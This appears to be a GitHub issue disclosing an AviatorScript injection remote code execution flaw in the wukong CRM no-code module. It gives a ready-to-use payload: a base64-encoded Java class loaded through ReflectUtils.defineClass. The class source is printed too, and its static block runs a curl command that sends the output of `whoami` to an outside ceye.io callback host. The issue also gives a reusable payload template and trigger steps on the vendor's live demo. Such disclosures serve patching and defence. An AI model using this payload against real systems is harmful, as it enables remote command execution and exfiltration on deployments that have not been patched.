Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

wukong nocoding module AviatorScript Inject RCE(AviatorScript后台命令执行) #4

Open
AfterSnows opened this issue Jul 1, 2024 · 0 comments
Open

wukong nocoding module AviatorScript Inject RCE(AviatorScript后台命令执行) #4

AfterSnows opened this issue Jul 1, 2024 · 0 comments

Comments

@AfterSnows
Copy link

漏洞影响版本

<=latest

In ExpressionUtil.java, AviatorEvaluator is used to directly execute expression functionality without any configured security policies, leading to potential AviatorScript injection vulnerabilities (which by default can execute arbitrary static methods).

漏洞描述

For example, running the following AviatorScript script can lead to executing a curl command.

use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('yv66vgAAADQAIQoABwAUCgAVABYIABcKABUAGAcAGQcAGgcAGwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQADTGE7AQAIPGNsaW5pdD4BAA1TdGFja01hcFRhYmxlBwAZAQAKU291cmNlRmlsZQEABmEuamF2YQwACAAJBwAcDAAdAB4BACtjdXJsIGh0dHA6Ly9pcC5wb3J0LmU3OGp0by5jZXllLmlvL2B3aG9hbWlgDAAfACABABNqYXZhL2xhbmcvRXhjZXB0aW9uAQABYQEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAC8AAQABAAAABSq3AAGxAAAAAgALAAAABgABAAAAAwAMAAAADAABAAAABQANAA4AAAAIAA8ACQABAAoAAABPAAIAAQAAAA64AAISA7YABFenAARLsQABAAAACQAMAAUAAwALAAAAEgAEAAAABgAJAAgADAAHAA0ACQAMAAAAAgAAABAAAAAHAAJMBwARAAABABIAAAACABM=');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);

payload生成过程:

public class a {
    static {
        try {
            Runtime.getRuntime().exec("curl http://ip.port.e78jto.ceye.io/`whoami`");
        } catch (Exception e) {
        }
    }
}

此java a类编译为class后转换为base64字符串后替换{{evilpayload}}处

use org.springframework.util.ClassUtils;let loader = ClassUtils.getDefaultClassLoader();use org.springframework.util.Base64Utils;let str = Base64Utils.decodeFromString('{{evilpayload}}');use org.springframework.cglib.core.ReflectUtils;ReflectUtils.defineClass('a',str,loader);

漏洞执行步骤

此漏洞使用官方环境都能执行命令执行:https://www.72crm.com/

由于AviatorEvaluator 得表达式存在很多地方都在使用,很多地方都能触发AviatorScript Inject。

首先在无代码模块中添加一个模块

image-20240701125420632

正常设置字段,添加计算公式为AviatorEvaluator命令执行的payload

我此处设置的手机为主模块,添加后执行表达式进行触发,选择的curl外带命令执行

image-20240701125451197

发布后进入此模块添加手机号进行触发
image-20240701125518834

命令执行结果演示

image-20240701125341074

漏洞修复建议

apache/hertzbeat@8dcf050
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@AfterSnows